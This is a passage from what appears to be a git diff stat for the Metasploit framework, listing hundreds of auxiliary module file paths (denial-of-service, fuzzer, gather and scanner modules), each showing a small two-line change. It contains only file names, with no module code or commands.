+- modules/auxiliary/admin/smb/samba_symlink_traversal.rb | 2 +- modules/auxiliary/admin/smb/upload_file.rb | 2 +- modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 2 +- modules/auxiliary/admin/tftp/tftp_transfer_util.rb | 2 +- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 2 +- modules/auxiliary/admin/upnp/soap_portmapping.rb | 2 +- modules/auxiliary/admin/vmware/poweroff_vm.rb | 2 +- modules/auxiliary/admin/vmware/poweron_vm.rb | 2 +- modules/auxiliary/admin/vmware/tag_vm.rb | 2 +- modules/auxiliary/admin/vmware/terminate_esx_sessions.rb | 2 +- modules/auxiliary/admin/vnc/realvnc_41_bypass.rb | 2 +- .../auxiliary/admin/vxworks/apple_airport_extreme_password.rb | 2 +- modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb | 2 +- modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb | 2 +- modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb | 2 +- modules/auxiliary/admin/webmin/edit_html_fileaccess.rb | 2 +- modules/auxiliary/admin/webmin/file_disclosure.rb | 2 +- modules/auxiliary/admin/zend/java_bridge.rb | 2 +- modules/auxiliary/analyze/jtr_aix.rb | 2 +- modules/auxiliary/analyze/jtr_crack_fast.rb | 2 +- modules/auxiliary/analyze/jtr_linux.rb | 2 +- modules/auxiliary/analyze/jtr_mssql_fast.rb | 2 +- modules/auxiliary/analyze/jtr_mysql_fast.rb | 2 +- modules/auxiliary/analyze/jtr_oracle_fast.rb | 2 +- modules/auxiliary/analyze/jtr_postgres_fast.rb | 2 +- modules/auxiliary/bnat/bnat_router.rb | 2 +- modules/auxiliary/bnat/bnat_scan.rb | 2 +- modules/auxiliary/client/smtp/emailer.rb | 2 +- modules/auxiliary/crawler/msfcrawler.rb | 2 +- modules/auxiliary/docx/word_unc_injector.rb | 2 +- modules/auxiliary/dos/cisco/ios_http_percentpercent.rb | 2 +- modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb | 2 +- modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb | 2 +- modules/auxiliary/dos/hp/data_protector_rds.rb | 2 +- modules/auxiliary/dos/http/3com_superstack_switch.rb | 2 +- .../dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb | 2 +- modules/auxiliary/dos/http/apache_mod_isapi.rb | 2 +- modules/auxiliary/dos/http/apache_range_dos.rb | 2 +- modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb | 2 +- modules/auxiliary/dos/http/canon_wireless_printer.rb | 2 +- modules/auxiliary/dos/http/dell_openmanage_post.rb | 2 +- modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb | 2 +- modules/auxiliary/dos/http/gzip_bomb_dos.rb | 2 +- modules/auxiliary/dos/http/hashcollision_dos.rb | 2 +- modules/auxiliary/dos/http/monkey_headers.rb | 2 +- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +- modules/auxiliary/dos/http/nodejs_pipelining.rb | 2 +- modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb | 2 +- modules/auxiliary/dos/http/rails_action_view.rb | 2 +- modules/auxiliary/dos/http/rails_json_float_dos.rb | 2 +- modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 2 +- modules/auxiliary/dos/http/webrick_regex.rb | 2 +- modules/auxiliary/dos/http/wordpress_long_password_dos.rb | 2 +- modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb | 2 +- modules/auxiliary/dos/mdns/avahi_portzero.rb | 2 +- modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb | 2 +- modules/auxiliary/dos/misc/memcached.rb | 2 +- modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb | 2 +- modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 2 +- modules/auxiliary/dos/samba/lsa_addprivs_heap.rb | 2 +- modules/auxiliary/dos/samba/lsa_transnames_heap.rb | 2 +- modules/auxiliary/dos/samba/read_nttrans_ea_list.rb | 2 +- modules/auxiliary/dos/scada/beckhoff_twincat.rb | 2 +- modules/auxiliary/dos/scada/d20_tftp_overflow.rb | 2 +- modules/auxiliary/dos/scada/igss9_dataserver.rb | 2 +- modules/auxiliary/dos/scada/yokogawa_logsvr.rb | 2 +- modules/auxiliary/dos/smtp/sendmail_prescan.rb | 2 +- modules/auxiliary/dos/solaris/lpd/cascade_delete.rb | 2 +- modules/auxiliary/dos/ssl/dtls_changecipherspec.rb | 2 +- modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb | 2 +- modules/auxiliary/dos/syslog/rsyslog_long_tag.rb | 2 +- modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 2 +- modules/auxiliary/dos/tcp/synflood.rb | 2 +- modules/auxiliary/dos/upnp/miniupnpd_dos.rb | 2 +- modules/auxiliary/dos/windows/appian/appian_bpm.rb | 2 +- modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb | 2 +- modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb | 2 +- modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb | 2 +- modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb | 2 +- modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb | 2 +- modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb | 2 +- modules/auxiliary/dos/windows/ftp/solarftp_user.rb | 2 +- modules/auxiliary/dos/windows/ftp/titan626_site.rb | 2 +- modules/auxiliary/dos/windows/ftp/vicftps50_list.rb | 2 +- modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb | 2 +- modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb | 2 +- modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb | 2 +- modules/auxiliary/dos/windows/games/kaillera.rb | 2 +- modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb | 2 +- modules/auxiliary/dos/windows/http/pi3web_isapi.rb | 2 +- modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb | 2 +- modules/auxiliary/dos/windows/nat/nat_helper.rb | 2 +- modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb | 2 +- modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb | 2 +- modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb | 2 +- modules/auxiliary/dos/windows/smb/ms06_063_trans.rb | 2 +- modules/auxiliary/dos/windows/smb/ms09_001_write.rb | 2 +- .../dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb | 2 +- .../auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb | 2 +- .../dos/windows/smb/ms10_006_negotiate_response_loop.rb | 2 +- .../auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb | 2 +- modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb | 2 +- modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb | 2 +- modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb | 2 +- modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb | 2 +- modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb | 2 +- modules/auxiliary/dos/windows/tftp/pt360_write.rb | 2 +- modules/auxiliary/dos/windows/tftp/solarwinds.rb | 2 +- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- modules/auxiliary/dos/wireshark/chunked.rb | 2 +- modules/auxiliary/dos/wireshark/cldap.rb | 2 +- modules/auxiliary/dos/wireshark/ldap.rb | 2 +- modules/auxiliary/fuzzers/dns/dns_fuzzer.rb | 2 +- modules/auxiliary/fuzzers/ftp/client_ftp.rb | 2 +- modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb | 2 +- modules/auxiliary/fuzzers/http/http_form_field.rb | 2 +- modules/auxiliary/fuzzers/http/http_get_uri_long.rb | 2 +- modules/auxiliary/fuzzers/http/http_get_uri_strings.rb | 2 +- modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb | 2 +- modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_create_pipe.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_tree_connect.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_version_15.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_version_2.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb | 2 +- modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb | 2 +- modules/auxiliary/fuzzers/tds/tds_login_username.rb | 2 +- modules/auxiliary/gather/android_browser_file_theft.rb | 2 +- .../auxiliary/gather/android_browser_new_tab_cookie_theft.rb | 2 +- modules/auxiliary/gather/android_htmlfileprovider.rb | 2 +- modules/auxiliary/gather/android_object_tag_webview_uxss.rb | 2 +- modules/auxiliary/gather/android_stock_browser_uxss.rb | 2 +- modules/auxiliary/gather/apache_karaf_command_execution.rb | 2 +- modules/auxiliary/gather/apache_rave_creds.rb | 2 +- modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb | 2 +- modules/auxiliary/gather/apple_safari_webarchive_uxss.rb | 2 +- modules/auxiliary/gather/avtech744_dvr_accounts.rb | 2 +- modules/auxiliary/gather/checkpoint_hostname.rb | 2 +- modules/auxiliary/gather/citrix_published_applications.rb | 2 +- modules/auxiliary/gather/citrix_published_bruteforce.rb | 2 +- modules/auxiliary/gather/coldfusion_pwd_props.rb | 2 +- modules/auxiliary/gather/corpwatch_lookup_id.rb | 2 +- modules/auxiliary/gather/corpwatch_lookup_name.rb | 2 +- modules/auxiliary/gather/d20pass.rb | 2 +- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- modules/auxiliary/gather/dns_cache_scraper.rb | 2 +- modules/auxiliary/gather/dns_info.rb | 2 +- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- modules/auxiliary/gather/dns_srv_enum.rb | 2 +- modules/auxiliary/gather/doliwamp_traversal_creds.rb | 2 +- modules/auxiliary/gather/drupal_openid_xxe.rb | 2 +- modules/auxiliary/gather/eaton_nsm_creds.rb | 2 +- modules/auxiliary/gather/emc_cta_xxe.rb | 2 +- modules/auxiliary/gather/enum_dns.rb | 2 +- modules/auxiliary/gather/eventlog_cred_disclosure.rb | 2 +- modules/auxiliary/gather/external_ip.rb | 2 +- modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb | 2 +- modules/auxiliary/gather/firefox_pdfjs_file_theft.rb | 2 +- modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb | 2 +- modules/auxiliary/gather/hp_enum_perfd.rb | 2 +- modules/auxiliary/gather/hp_snac_domain_creds.rb | 2 +- modules/auxiliary/gather/huawei_wifi_info.rb | 2 +- modules/auxiliary/gather/ibm_sametime_enumerate_users.rb | 2 +- modules/auxiliary/gather/ibm_sametime_room_brute.rb | 2 +- modules/auxiliary/gather/ibm_sametime_version.rb | 2 +- modules/auxiliary/gather/ie_uxss_injection.rb | 2 +- modules/auxiliary/gather/java_rmi_registry.rb | 2 +- modules/auxiliary/gather/jenkins_cred_recovery.rb | 2 +- modules/auxiliary/gather/joomla_weblinks_sqli.rb | 2 +- modules/auxiliary/gather/konica_minolta_pwd_extract.rb | 2 +- modules/auxiliary/gather/lansweeper_collector.rb | 2 +- modules/auxiliary/gather/mcafee_epo_xxe.rb | 2 +- modules/auxiliary/gather/memcached_extractor.rb | 2 +- modules/auxiliary/gather/ms14_052_xmldom.rb | 2 +- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- modules/auxiliary/gather/natpmp_external_address.rb | 2 +- modules/auxiliary/gather/safari_file_url_navigation.rb | 2 +- modules/auxiliary/gather/search_email_collector.rb | 2 +- modules/auxiliary/gather/solarwinds_orion_sqli.rb | 2 +- modules/auxiliary/gather/ssllabs_scan.rb | 2 +- modules/auxiliary/gather/trackit_sql_domain_creds.rb | 2 +- modules/auxiliary/gather/vbulletin_vote_sqli.rb | 2 +- modules/auxiliary/gather/windows_deployment_services_shares.rb | 2 +- modules/auxiliary/gather/wp_all_in_one_migration_export.rb | 2 +- .../auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb | 2 +- modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb | 2 +- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- modules/auxiliary/gather/xerox_pwd_extract.rb | 2 +- modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb | 2 +- modules/auxiliary/parser/unattend.rb | 2 +- modules/auxiliary/pdf/foxit/authbypass.rb | 2 +- modules/auxiliary/scanner/acpp/login.rb | 2 +- modules/auxiliary/scanner/afp/afp_login.rb | 2 +- modules/auxiliary/scanner/afp/afp_server_info.rb | 2 +- modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb | 2 +- modules/auxiliary/scanner/chargen/chargen_probe.rb | 2 +- modules/auxiliary/scanner/couchdb/couchdb_enum.rb | 2 +- modules/auxiliary/scanner/couchdb/couchdb_login.rb | 2 +- modules/auxiliary/scanner/db2/db2_auth.rb | 2 +- modules/auxiliary/scanner/db2/db2_version.rb | 2 +- modules/auxiliary/scanner/db2/discovery.rb | 2 +- modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb | 2 +- modules/auxiliary/scanner/dcerpc/hidden.rb | 2 +- modules/auxiliary/scanner/dcerpc/management.rb | 2 +- modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb | 2 +- modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb | 2 +- modules/auxiliary/scanner/dect/call_scanner.rb | 2 +- modules/auxiliary/scanner/dect/station_scanner.rb | 2 +- modules/auxiliary/scanner/discovery/arp_sweep.rb | 2 +- modules/auxiliary/scanner/discovery/empty_udp.rb | 2 +- modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb | 2 +- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 2 +- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 2 +- modules/auxiliary/scanner/discovery/udp_probe.rb | 2 +- modules/auxiliary/scanner/discovery/udp_sweep.rb | 2 +- modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb | 2 +- modules/auxiliary/scanner/dns/dns_amp.rb | 2 +- modules/auxiliary/scanner/elasticsearch/indices_enum.rb | 2 +- modules/auxiliary/scanner/emc/alphastor_devicemanager.rb | 2 +- modules/auxiliary/scanner/emc/alphastor_librarymanager.rb | 2 +- modules/auxiliary/scanner/finger/finger_users.rb | 2 +- modules/auxiliary/scanner/ftp/anonymous.rb | 2 +- modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb | 2 +- modules/auxiliary/scanner/ftp/ftp_login.rb | 2 +- modules/auxiliary/scanner/ftp/ftp_version.rb | 2 +- modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb | 2 +- modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb | 2 +- modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb | 2 +- modules/auxiliary/scanner/h323/h323_version.rb | 2 +- .../scanner/http/a10networks_ax_directory_traversal.rb | 2 +- .../auxiliary/scanner/http/accellion_fta_statecode_file_read.rb | 2 +- modules/auxiliary/scanner/http/adobe_xml_inject.rb | 2 +- .../auxiliary/scanner/http/apache_activemq_source_disclosure.rb | 2 +- modules/auxiliary/scanner/http/apache_activemq_traversal.rb | 2 +- modules/auxiliary/scanner/http/apache_userdir_enum.rb | 2 +- modules/auxiliary/scanner/http/appletv_login.rb | 2 +- modules/auxiliary/scanner/http/axis_local_file_include.rb | 2 +- modules/auxiliary/scanner/http/axis_login.rb | 2 +- modules/auxiliary/scanner/http/backup_file.rb | 2 +- modules/auxiliary/scanner/http/barracuda_directory_traversal.rb | 2 +- .../auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb | 2 +- modules/auxiliary/scanner/http/blind_sql_query.rb | 2 +- modules/auxiliary/scanner/http/brute_dirs.rb | 2 +- modules/auxiliary/scanner/http/buffalo_login.rb | 2 +- modules/auxiliary/scanner/http/canon_wireless.rb | 2 +- modules/auxiliary/scanner/http/cert.rb | 2 +- modules/auxiliary/scanner/http/chef_webui_login.rb | 2 +- modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 2 +- modules/auxiliary/scanner/http/cisco_device_manager.rb | 2 +- modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb | 2 +- modules/auxiliary/scanner/http/cisco_ironport_enum.rb | 2 +- modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb | 2 +- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +- modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb | 2 +- modules/auxiliary/scanner/http/clansphere_traversal.rb | 2 +- modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb | 2 +- modules/auxiliary/scanner/http/coldfusion_version.rb | 2 +- modules/auxiliary/scanner/http/copy_of_file.rb | 2 +- modules/auxiliary/scanner/http/crawler.rb | 2 +- modules/auxiliary/scanner/http/dell_idrac.rb | 2 +- modules/auxiliary/scanner/http/dir_listing.rb | 2 +- modules/auxiliary/scanner/http/dir_scanner.rb | 2 +- modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb | 2 +- modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb | 2 +- modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb | 2 +- .../auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb | 2 +- modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb | 2 +- modules/auxiliary/scanner/http/dolibarr_login.rb | 2 +- modules/auxiliary/scanner/http/drupal_views_user_enum.rb | 2 +- modules/auxiliary/scanner/http/ektron_cms400net.rb | 2 +- modules/auxiliary/scanner/http/elasticsearch_traversal.rb | 2 +- modules/auxiliary/scanner/http/enum_wayback.rb | 2 +- modules/auxiliary/scanner/http/error_sql_injection.rb | 2 +- modules/auxiliary/scanner/http/etherpad_duo_login.rb | 2 +- modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb | 2 +- modules/auxiliary/scanner/http/f5_mgmt_scanner.rb | 2 +- modules/auxiliary/scanner/http/file_same_name_dir.rb | 2 +- modules/auxiliary/scanner/http/files_dir.rb | 2 +- modules/auxiliary/scanner/http/frontpage_login.rb | 2 +- modules/auxiliary/scanner/http/git_scanner.rb | 2 +- modules/auxiliary/scanner/http/gitlab_login.rb | 2 +- modules/auxiliary/scanner/http/gitlab_user_enum.rb | 2 +- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- modules/auxiliary/scanner/http/goahead_traversal.rb | 2 +- .../auxiliary/scanner/http/groupwise_agents_http_traversal.rb | 2 +- .../scanner/http/hp_imc_bims_downloadservlet_traversal.rb | 2 +- .../scanner/http/hp_imc_faultdownloadservlet_traversal.rb | 2 +- .../scanner/http/hp_imc_ictdownloadservlet_traversal.rb | 2 +- .../auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb | 2 +- modules/auxiliary/scanner/http/hp_imc_som_file_download.rb | 2 +- modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb | 2 +- modules/auxiliary/scanner/http/http_header.rb | 2 +- modules/auxiliary/scanner/http/http_hsts.rb | 2 +- modules/auxiliary/scanner/http/http_login.rb | 2 +- modules/auxiliary/scanner/http/http_traversal.rb | 2 +- modules/auxiliary/scanner/http/http_version.rb | 2 +- modules/auxiliary/scanner/http/httpbl_lookup.rb | 2 +- modules/auxiliary/scanner/http/iis_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/influxdb_enum.rb | 2 +- modules/auxiliary/scanner/http/infovista_enum.rb | 2 +- modules/auxiliary/scanner/http/ipboard_login.rb | 2 +- modules/auxiliary/scanner/http/jboss_status.rb | 2 +- modules/auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- modules/auxiliary/scanner/http/jenkins_command.rb | 2 +- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- modules/auxiliary/scanner/http/jenkins_login.rb | 2 +- modules/auxiliary/scanner/http/joomla_bruteforce_login.rb | 2 +- modules/auxiliary/scanner/http/joomla_pages.rb | 2 +- modules/auxiliary/scanner/http/joomla_plugins.rb | 2 +- modules/auxiliary/scanner/http/joomla_version.rb | 2 +- modules/auxiliary/scanner/http/linknat_vos_traversal.rb | 2 +- modules/auxiliary/scanner/http/linksys_e1500_traversal.rb | 2 +- modules/auxiliary/scanner/http/litespeed_source_disclosure.rb | 2 +- modules/auxiliary/scanner/http/lucky_punch.rb | 2 +- .../auxiliary/scanner/http/majordomo2_directory_traversal.rb | 2 +- .../scanner/http/manageengine_desktop_central_login.rb | 2 +- .../scanner/http/manageengine_deviceexpert_traversal.rb | 2 +- .../scanner/http/manageengine_deviceexpert_user_creds.rb | 2 +- .../scanner/http/manageengine_securitymanager_traversal.rb | 2 +- modules/auxiliary/scanner/http/mod_negotiation_brute.rb | 2 +- modules/auxiliary/scanner/http/mod_negotiation_scanner.rb | 2 +- .../auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb | 2 +- modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb | 2 +- modules/auxiliary/scanner/http/mybook_live_login.rb | 2 +- modules/auxiliary/scanner/http/netdecision_traversal.rb | 2 +- modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb | 2 +- modules/auxiliary/scanner/http/nginx_source_disclosure.rb | 2 +- modules/auxiliary/scanner/http/novell_mdm_creds.rb | 2 +- modules/auxiliary/scanner/http/ntlm_info_enumeration.rb | 2 +- modules/auxiliary/scanner/http/open_proxy.rb | 2 +- modules/auxiliary/scanner/http/openmind_messageos_login.rb | 2 +- modules/auxiliary/scanner/http/options.rb | 2 +- .../scanner/http/oracle_demantra_database_credentials_leak.rb | 2 +- .../auxiliary/scanner/http/oracle_demantra_file_retrieval.rb | 2 +- modules/auxiliary/scanner/http/oracle_ilom_login.rb | 2 +- modules/auxiliary/scanner/http/owa_iis_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/owa_login.rb | 2 +- modules/auxiliary/scanner/http/pocketpad_login.rb | 2 +- modules/auxiliary/scanner/http/prev_dir_same_name_file.rb | 2 +- modules/auxiliary/scanner/http/radware_appdirector_enum.rb | 2 +- modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb | 2 +- modules/auxiliary/scanner/http/rails_mass_assignment.rb | 2 +- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 2 +- modules/auxiliary/scanner/http/replace_ext.rb | 2 +- modules/auxiliary/scanner/http/rfcode_reader_enum.rb | 2 +- modules/auxiliary/scanner/http/rips_traversal.rb | 2 +- modules/auxiliary/scanner/http/robots_txt.rb | 2 +- modules/auxiliary/scanner/http/s40_traversal.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_user_brute.rb | 2 +- .../scanner/http/sap_businessobjects_user_brute_web.rb | 2 +- modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_version_enum.rb | 2 +- modules/auxiliary/scanner/http/scraper.rb | 2 +- modules/auxiliary/scanner/http/sentry_cdu_enum.rb | 2 +- modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb | 2 +- modules/auxiliary/scanner/http/sevone_enum.rb | 2 +- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 2 +- modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb | 2 +- modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb | 2 +- modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb | 2 +- .../auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb | 2 +- modules/auxiliary/scanner/http/soap_xml.rb | 2 +- modules/auxiliary/scanner/http/sockso_traversal.rb | 2 +- modules/auxiliary/scanner/http/splunk_web_login.rb | 2 +- modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 2 +- modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb | 2 +- modules/auxiliary/scanner/http/ssl_version.rb | 2 +- .../scanner/http/support_center_plus_directory_traversal.rb | 2 +- modules/auxiliary/scanner/http/svn_scanner.rb | 2 +- modules/auxiliary/scanner/http/svn_wcdb_scanner.rb | 2 +- modules/auxiliary/scanner/http/sybase_easerver_traversal.rb | 2 +- modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb | 2 +- modules/auxiliary/scanner/http/symantec_web_gateway_login.rb | 2 +- modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +- modules/auxiliary/scanner/http/title.rb | 2 +- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 2 +- modules/auxiliary/scanner/http/tplink_traversal_noauth.rb | 2 +- modules/auxiliary/scanner/http/trace.rb | 2 +- modules/auxiliary/scanner/http/trace_axd.rb | 2 +- modules/auxiliary/scanner/http/typo3_bruteforce.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 2 +- modules/auxiliary/scanner/http/vhost_scanner.rb | 2 +- modules/auxiliary/scanner/http/wangkongbao_traversal.rb | 2 +- modules/auxiliary/scanner/http/web_vulndb.rb | 2 +- modules/auxiliary/scanner/http/webdav_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/webdav_scanner.rb | 2 +- modules/auxiliary/scanner/http/webdav_website_content.rb | 2 +- modules/auxiliary/scanner/http/webpagetest_traversal.rb | 2 +- modules/auxiliary/scanner/http/wildfly_traversal.rb | 2 +- modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb | 2 +- modules/auxiliary/scanner/http/wordpress_login_enum.rb | 2 +- modules/auxiliary/scanner/http/wordpress_multicall_creds.rb | 2 +- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 2 +- modules/auxiliary/scanner/http/wordpress_scanner.rb | 2 +- modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb | 2 +- modules/auxiliary/scanner/http/wp_dukapress_file_read.rb | 2 +- modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb | 2 +- .../auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb | 2 +- modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb | 2 +- modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb | 2 +- modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb | 2 +- .../auxiliary/scanner/http/wp_subscribe_comments_file_read.rb | 2 +- modules/auxiliary/scanner/http/xpath.rb | 2 +- modules/auxiliary/scanner/http/yaws_traversal.rb | 2 +- modules/auxiliary/scanner/http/zabbix_login.rb | 2 +- .../scanner/http/zenworks_assetmanagement_fileaccess.rb | 2 +- .../scanner/http/zenworks_assetmanagement_getconfig.rb | 2 +- modules/auxiliary/scanner/imap/imap_version.rb | 2 +- modules/auxiliary/scanner/ip/ipidseq.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 2 +- modules/auxiliary/scanner/ipmi/ipmi_version.rb | 2 +- modules/auxiliary/scanner/kademlia/server_info.rb | 2 +- modules/auxiliary/scanner/llmnr/query.rb | 2 +- modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb | 2 +- modules/auxiliary/scanner/lotus/lotus_domino_login.rb | 2 +- modules/auxiliary/scanner/lotus/lotus_domino_version.rb | 2 +- modules/auxiliary/scanner/mdns/query.rb | 2 +- modules/auxiliary/scanner/misc/cctv_dvr_login.rb | 2 +- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 2 +- modules/auxiliary/scanner/misc/dvr_config_disclosure.rb | 2 +- modules/auxiliary/scanner/misc/ib_service_mgr_info.rb | 2 +- modules/auxiliary/scanner/misc/java_rmi_server.rb | 2 +- modules/auxiliary/scanner/misc/oki_scanner.rb | 2 +- modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb | 2 +- modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb | 2 +- modules/auxiliary/scanner/misc/redis_server.rb | 2 +- modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb | 2 +- modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb | 2 +- modules/auxiliary/scanner/misc/sunrpc_portmapper.rb | 2 +- modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb | 2 +- modules/auxiliary/scanner/mongodb/mongodb_login.rb | 2 +- modules/auxiliary/scanner/motorola/timbuktu_udp.rb | 2 +- modules/auxiliary/scanner/msf/msf_rpc_login.rb | 2 +- modules/auxiliary/scanner/msf/msf_web_login.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_hashdump.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_login.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_ping.rb | 2 +- modules/auxiliary/scanner/mssql/mssql_schemadump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_hashdump.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_login.rb | 2 +- modules/auxiliary/scanner/mysql/mysql_schemadump.rb 